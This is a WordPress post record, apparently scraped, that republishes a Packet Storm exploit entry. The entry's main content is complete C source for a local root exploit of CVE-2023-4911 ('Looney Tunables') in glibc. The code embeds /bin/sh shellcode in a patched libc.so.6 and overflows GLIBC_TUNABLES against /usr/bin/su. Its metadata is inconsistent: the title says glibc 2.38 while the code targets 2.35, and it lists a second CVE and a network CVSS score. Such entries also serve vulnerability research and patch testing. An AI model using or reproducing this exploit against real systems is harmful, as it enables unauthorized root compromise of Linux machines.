{"id":40489,"date":"2026-02-11T12:47:39","date_gmt":"2026-02-11T12:47:39","guid":{"rendered":"http:\/\/localhost\/?p=40489"},"modified":"2026-02-11T12:47:39","modified_gmt":"2026-02-11T12:47:39","slug":"glibc-238-buffer-overflow","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=40489","title":{"rendered":"\ud83d\udcc4 glibc 2.38 Buffer Overflow_PACKETSTORM:215376"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-11T17:48:02&#8243;,&#8221;description&#8221;:&#8221;This is a local privilege escalation exploit for CVE-2023-4911, also known as \\&#8221;Looney Tunables\\&#8221;, caused by a buffer overflow in the glibc dynamic loader&#8217;s environment variable parsing logic. The vulnerability is triggered by crafting a maliciously long&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-11T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-11T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 glibc 2.38 Buffer Overflow&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215376&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-4911&#8243;,&#8221;CVE-2025-4911&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: glibc 2.38 &#8211; Buffer Overflow \\n    # Google Dork: N\/A\\n    # Date: 2025-10-08\\n    # Exploit Author: Beatriz Fresno Naumova\\n    # Vendor Homepage: https:\/\/www.gnu.org\/software\/libc\/\\n    # Software Link: https:\/\/ftp.gnu.org\/gnu\/libc\/glibc-2.35.tar.gz\\n    # Version: glibc 2.35 (specifically 2.35-0ubuntu3.3 on Ubuntu 22.04.3 LTS)\\n    # Tested on: Ubuntu 22.04.3 LTS (glibc 2.35-0ubuntu3.3)\\n    # CVE : CVE-2023-4911\\n    \\n    # Description:\\n    Looney Tunables &#8211; glibc GLIBC_TUNABLES Environment Variable Buffer Overflow \\n    # This is a local privilege escalation exploit for CVE-2023-4911, also known as\\n    # \\&#8221;Looney Tunables\\&#8221;, caused by a buffer overflow in the glibc dynamic loader&#8217;s\\n    # environment variable parsing logic. The vulnerability is triggered by crafting\\n    # a maliciously long GLIBC_TUNABLES string which corrupts internal loader state,\\n    # allowing control over DT_RPATH and arbitrary shared object loading.\\n    #\\n    # This PoC creates a patched version of libc.so.6 with embedded shellcode and\\n    # abuses the loader to execute arbitrary code as root by invoking \/usr\/bin\/su\\n    # with a malicious environment.\\n    #\\n    \\n    \\n    \\n    \\n    #define _GNU_SOURCE\\n    #include \\u003cstdio.h\\u003e\\n    #include \\u003cstdlib.h\\u003e\\n    #include \\u003cstring.h\\u003e\\n    #include \\u003cstdint.h\\u003e\\n    #include \\u003cunistd.h\\u003e\\n    #include \\u003cerrno.h\\u003e\\n    #include \\u003cfcntl.h\\u003e\\n    #include \\u003ctime.h\\u003e\\n    #include \\u003csys\/stat.h\\u003e\\n    #include \\u003csys\/types.h\\u003e\\n    #include \\u003csys\/resource.h\\u003e\\n    #include \\u003csys\/wait.h\\u003e\\n    #include \\u003celf.h\\u003e\\n    \\n    #define FILL_SIZE 0xd00\\n    #define BOF_SIZE 0x600\\n    #define MAX_ENVP  0x1000\\n    \\n    \/\/ shellcode generado con pwntools\\n    const unsigned char shellcode[] = {\\n        0x48, 0x31, 0xff,                         \/\/ xor    rdi,rdi\\n        0x6a, 0x69,                               \/\/ push   0x69 ; syscall setuid\\n        0x58,                                     \/\/ pop    rax\\n        0x0f, 0x05,                               \/\/ syscall\\n        0x48, 0x31, 0xff,                         \/\/ xor    rdi,rdi\\n        0x6a, 0x6a,                               \/\/ push   0x6a ; syscall setgid\\n        0x58,                                     \/\/ pop    rax\\n        0x0f, 0x05,                               \/\/ syscall\\n        0x48, 0x31, 0xd2,                         \/\/ xor    rdx, rdx\\n        0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, \\n        0x2f, 0x73, 0x68, 0x00,                   \/\/ mov rbx, \\&#8221;\/bin\/sh\\&#8221;\\n        0x53,                                     \/\/ push rbx\\n        0x48, 0x89, 0xe7,                         \/\/ mov rdi, rsp\\n        0x50,                                     \/\/ push rax\\n        0x57,                                     \/\/ push rdi\\n        0x48, 0x89, 0xe6,                         \/\/ mov rsi, rsp\\n        0xb0, 0x3b,                               \/\/ mov al, 0x3b\\n        0x0f, 0x05                                \/\/ syscall\\n    };\\n    \\n    int64_t time_us() {\\n        struct timespec tms;\\n        if (clock_gettime(CLOCK_REALTIME, \\u0026tms)) return -1;\\n        int64_t micros = tms.tv_sec * 1000000;\\n        micros += tms.tv_nsec \/ 1000;\\n        if (tms.tv_nsec % 1000 \\u003e= 500) ++micros;\\n        return micros;\\n    }\\n    \\n    void patch_libc() {\\n        FILE *f = fopen(\\&#8221;\/lib\/x86_64-linux-gnu\/libc.so.6\\&#8221;, \\&#8221;rb\\&#8221;);\\n        if (!f) { perror(\\&#8221;fopen\\&#8221;); exit(1); }\\n    \\n        fseek(f, 0, SEEK_END);\\n        long size = ftell(f);\\n        rewind(f);\\n    \\n        unsigned char *data = malloc(size);\\n        if (fread(data, 1, size, f) != size) {\\n            perror(\\&#8221;fread\\&#8221;);\\n            exit(1);\\n        }\\n        fclose(f);\\n    \\n        Elf64_Ehdr *ehdr = (Elf64_Ehdr *)data;\\n        Elf64_Shdr *shdr = (Elf64_Shdr *)(data + ehdr-\\u003ee_shoff);\\n        Elf64_Sym *symtab = NULL;\\n        char *strtab = NULL;\\n    \\n        for (int i = 0; i \\u003c ehdr-\\u003ee_shnum; ++i) {\\n            if (shdr[i].sh_type == SHT_SYMTAB) {\\n                symtab = (Elf64_Sym *)(data + shdr[i].sh_offset);\\n                strtab = (char *)(data + shdr[shdr[i].sh_link].sh_offset);\\n                break;\\n            }\\n        }\\n    \\n        if (!symtab || !strtab) {\\n            fprintf(stderr, \\&#8221;[-] Failed to find symtab\\\\n\\&#8221;);\\n            exit(1);\\n        }\\n    \\n        Elf64_Addr target_addr = 0;\\n        for (int i = 0; i \\u003c shdr-\\u003esh_size \/ sizeof(Elf64_Sym); ++i) {\\n            if (strcmp(\\u0026strtab[symtab[i].st_name], \\&#8221;__libc_start_main\\&#8221;) == 0) {\\n                target_addr = symtab[i].st_value;\\n                break;\\n            }\\n        }\\n    \\n        if (!target_addr) {\\n            fprintf(stderr, \\&#8221;[-] Could not find __libc_start_main\\\\n\\&#8221;);\\n            exit(1);\\n        }\\n    \\n        \/\/ patch shellcode at the symbol location\\n        memcpy(data + target_addr, shellcode, sizeof(shellcode));\\n    \\n        f = fopen(\\&#8221;.\/libc.so.6\\&#8221;, \\&#8221;wb\\&#8221;);\\n        if (!f) { perror(\\&#8221;fopen (write)\\&#8221;); exit(1); }\\n        fwrite(data, 1, size, f);\\n        fclose(f);\\n    \\n        free(data);\\n        printf(\\&#8221;[+] Patched libc.so.6 written.\\\\n\\&#8221;);\\n    }\\n    \\n    int main(void) {\\n        char filler[FILL_SIZE], kv[BOF_SIZE], filler2[BOF_SIZE + 0x20], dt_rpath[0x20000];\\n        char *argv[] = {\\&#8221;\/usr\/bin\/su\\&#8221;, \\&#8221;&#8211;help\\&#8221;, NULL};\\n        char *envp[MAX_ENVP] = { NULL };\\n    \\n        \/\/ Create directory and patched libc if not present\\n        if (mkdir(\\&#8221;\\\\\\&#8221;\\&#8221;, 0755) == 0) {\\n            patch_libc();\\n            int sfd = open(\\&#8221;.\/libc.so.6\\&#8221;, O_RDONLY);\\n            int dfd = open(\\&#8221;\\\\\\&#8221;\/libc.so.6\\&#8221;, O_CREAT | O_WRONLY, 0755);\\n            char buf[0x1000];\\n            int len;\\n            while ((len = read(sfd, buf, sizeof(buf))) \\u003e 0) {\\n                write(dfd, buf, len);\\n            }\\n            close(sfd); close(dfd);\\n        }\\n    \\n        memset(filler, &#8216;F&#8217;, sizeof(filler)); filler[sizeof(filler)-1] = &#8216;\\\\0&#8217;;\\n        strcpy(filler, \\&#8221;GLIBC_TUNABLES=glibc.malloc.mxfast=\\&#8221;);\\n    \\n        memset(kv, &#8216;A&#8217;, sizeof(kv)); kv[sizeof(kv)-1] = &#8216;\\\\0&#8217;;\\n        strcpy(kv, \\&#8221;GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=\\&#8221;);\\n    \\n        memset(filler2, &#8216;F&#8217;, sizeof(filler2)); filler2[sizeof(filler2)-1] = &#8216;\\\\0&#8217;;\\n        strcpy(filler2, \\&#8221;GLIBC_TUNABLES=glibc.malloc.mxfast=\\&#8221;);\\n    \\n        for (int i = 0; i \\u003c MAX_ENVP; i++) envp[i] = \\&#8221;\\&#8221;;\\n        envp[0] = filler;\\n        envp[1] = kv;\\n        envp[0x65] = \\&#8221;\\&#8221;;\\n        envp[0x65 + 0xb8] = \\&#8221;\\\\x30\\\\xf0\\\\xff\\\\xff\\\\xfd\\\\x7f\\&#8221;;\\n        envp[0xf7f] = filler2;\\n    \\n        for (int i = 0; i \\u003c sizeof(dt_rpath); i += 8) {\\n            *(uintptr_t *)(dt_rpath + i) = -0x14ULL;\\n        }\\n        dt_rpath[sizeof(dt_rpath) &#8211; 1] = &#8216;\\\\0&#8217;;\\n        for (int i = 0; i \\u003c 0x2f; i++) {\\n            envp[0xf80 + i] = dt_rpath;\\n        }\\n        envp[0xffe] = \\&#8221;AAAA\\&#8221;;\\n    \\n        setrlimit(RLIMIT_STACK, \\u0026(struct rlimit){RLIM_INFINITY, RLIM_INFINITY});\\n    \\n        int pid;\\n        for (int ct = 1;; ct++) {\\n            if (ct % 100 == 0) printf(\\&#8221;try %d\\\\n\\&#8221;, ct);\\n    \\n            if ((pid = fork()) \\u003c 0) {\\n                perror(\\&#8221;fork\\&#8221;); break;\\n            } else if (pid == 0) {\\n                execve(argv[0], argv, envp);\\n                perror(\\&#8221;execve (child)\\&#8221;); exit(1);\\n            } else {\\n                int wstatus;\\n                int64_t st = time_us(), en;\\n                wait(\\u0026wstatus);\\n                en = time_us();\\n    \\n                if (!WIFSIGNALED(wstatus) \\u0026\\u0026 en &#8211; st \\u003e 1000000) {\\n                    printf(\\&#8221;[+] Exploit likely succeeded!\\\\n\\&#8221;);\\n                    break;\\n                }\\n            }\\n        }\\n    \\n        return 0;\\n    }&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/215376&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;3.0&#8243;,&#8221;vectorString&#8221;:&#8221;CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:L\/I:L\/A:L&#8221;,&#8221;baseScore&#8221;:7.3,&#8221;baseSeverity&#8221;:&#8221;HIGH&#8221;,&#8221;attackVector&#8221;:&#8221;NETWORK&#8221;,&#8221;attackComplexity&#8221;:&#8221;LOW&#8221;,&#8221;privilegesRequired&#8221;:&#8221;NONE&#8221;,&#8221;userInteraction&#8221;:&#8221;NONE&#8221;,&#8221;scope&#8221;:&#8221;UNCHANGED&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;LOW&#8221;,&#8221;integrityImpact&#8221;:&#8221;LOW&#8221;,&#8221;availabilityImpact&#8221;:&#8221;LOW&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/215376\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-11T17:48:02&#8243;,&#8221;description&#8221;:&#8221;This is a local privilege escalation exploit for CVE-2023-4911, also known as \\&#8221;Looney Tunables\\&#8221;, caused by a buffer overflow in the glibc dynamic loader&#8217;s environment&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-40489","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 glibc 2.38 Buffer Overflow_PACKETSTORM:215376 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=40489\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 glibc 2.38 Buffer Overflow_PACKETSTORM:215376 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-11T17:48:02&#8243;,&#8221;description&#8221;:&#8221;This is a local privilege escalation exploit for CVE-2023-4911, also known as &#8221;Looney Tunables&#8221;, caused by a buffer overflow in the glibc dynamic loader&#8217;s environment...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=40489\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-11T12:47:39+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40489#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40489\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 glibc 2.38 Buffer Overflow_PACKETSTORM:215376\",\"datePublished\":\"2026-02-11T12:47:39+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40489\"},\"wordCount\":1255,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40489#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40489\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40489\",\"name\":\"\ud83d\udcc4 glibc 2.38 Buffer Overflow_PACKETSTORM:215376 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-11T12:47:39+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40489#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40489\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40489#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 glibc 2.38 Buffer Overflow_PACKETSTORM:215376\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 glibc 2.38 Buffer Overflow_PACKETSTORM:215376 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=40489","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 glibc 2.38 Buffer Overflow_PACKETSTORM:215376 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-11T17:48:02&#8243;,&#8221;description&#8221;:&#8221;This is a local privilege escalation exploit for CVE-2023-4911, also known as &#8221;Looney Tunables&#8221;, caused by a buffer overflow in the glibc dynamic loader&#8217;s environment...","og_url":"https:\/\/zero.redgem.net\/?p=40489","og_site_name":"zero redgem","article_published_time":"2026-02-11T12:47:39+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=40489#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=40489"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 glibc 2.38 Buffer Overflow_PACKETSTORM:215376","datePublished":"2026-02-11T12:47:39+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=40489"},"wordCount":1255,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=40489#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=40489","url":"https:\/\/zero.redgem.net\/?p=40489","name":"\ud83d\udcc4 glibc 2.38 Buffer Overflow_PACKETSTORM:215376 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-11T12:47:39+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=40489#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=40489"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=40489#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 glibc 2.38 Buffer Overflow_PACKETSTORM:215376"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40489","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=40489"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40489\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=40489"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=40489"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=40489"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}